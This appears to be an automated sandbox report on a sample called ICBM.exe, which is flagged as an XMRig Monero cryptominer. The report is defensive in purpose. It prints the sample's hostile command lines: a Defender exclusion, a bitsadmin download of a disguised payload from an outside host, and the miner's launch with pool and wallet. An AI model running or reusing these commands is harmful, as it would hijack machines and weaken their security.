Source: 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: ICBM.exe PID: 8064, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: msvchost.exe PID: 5828, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: WinRing0x64.sys.3.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.evad.mine.winEXE@19/13@2/3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3180:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3440:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5176:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\TEMP\__PSScriptPolicyTest_52g4imp4.qvm.ps1 Jump to behavior
Source: ICBM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ICBM.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ICBM.exe String found in binary or memory: --helphelp--
Source: ICBM.exe String found in binary or memory: --helphelp--
Source: ICBM.exe String found in binary or memory: --helphelp--*
Source: ICBM.exe String found in binary or memory: --helphelp--*
Source: ICBM.exe String found in binary or memory: helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ICBM.exe String found in binary or memory: helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ICBM.exe String found in binary or memory: 3helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ICBM.exe String found in binary or memory: 3helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ICBM.exe String found in binary or memory: {before-help}{about-with-newline}
Source: ICBM.exe String found in binary or memory: {usage-heading} {usage}{after-help}{before-help}{about-with-newline}
Source: ICBM.exe String found in binary or memory: {all-args}{after-help}
Source: ICBM.exe String found in binary or memory: 7{before-help}{about-with-newline}
Source: ICBM.exe String found in binary or memory: optionstabbefore-help{}
Source: unknown Process created: C:\Users\user\Desktop\ICBM.exe "C:\Users\user\Desktop\ICBM.exe"
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\sc.exe "sc" start my_system_service
Source: unknown Process created: C:\Users\user\Desktop\ICBM.exe C:\Users\user\Desktop\ICBM.exe
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\bitsadmin.exe "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png
Source: C:\Windows\System32\bitsadmin.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\msvchost.exe C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT --tls --coin monero
Source: C:\Windows\System32\msvchost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\sc.exe "sc" start my_system_service Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\"" Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\bitsadmin.exe "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\msvchost.exe C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT --tls --coin monero Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\msvchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: ICBM.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ICBM.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: ICBM.exe Static file information: File size 2534400 > 1048576
Source: ICBM.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bc000
Source: ICBM.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ICBM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ICBM.pdb source: ICBM.exe
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ICBM.exe, WinRing0x64.sys.3.dr
Source: msvchost.exe.3.dr Static PE information: section name: _RANDOMX
Source: msvchost.exe.3.dr Static PE information: section name: _TEXT_CN
Source: msvchost.exe.3.dr Static PE information: section name: _TEXT_CN
Source: msvchost.exe.3.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D67CCF push rsi; ret 0_2_00007FF6D2D67CD7

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\ICBM.exe Executable created and started: C:\Windows\System32\msvchost.exe Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\WinRing0x64.sys Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\bitsadmin.exe "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\bitsadmin.exe "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\msvchost.exe Jump to dropped file
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\msvchost.exe Jump to dropped file
Source: C:\Users\user\Desktop\ICBM.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdBoot Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\sc.exe "sc" start my_system_service

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
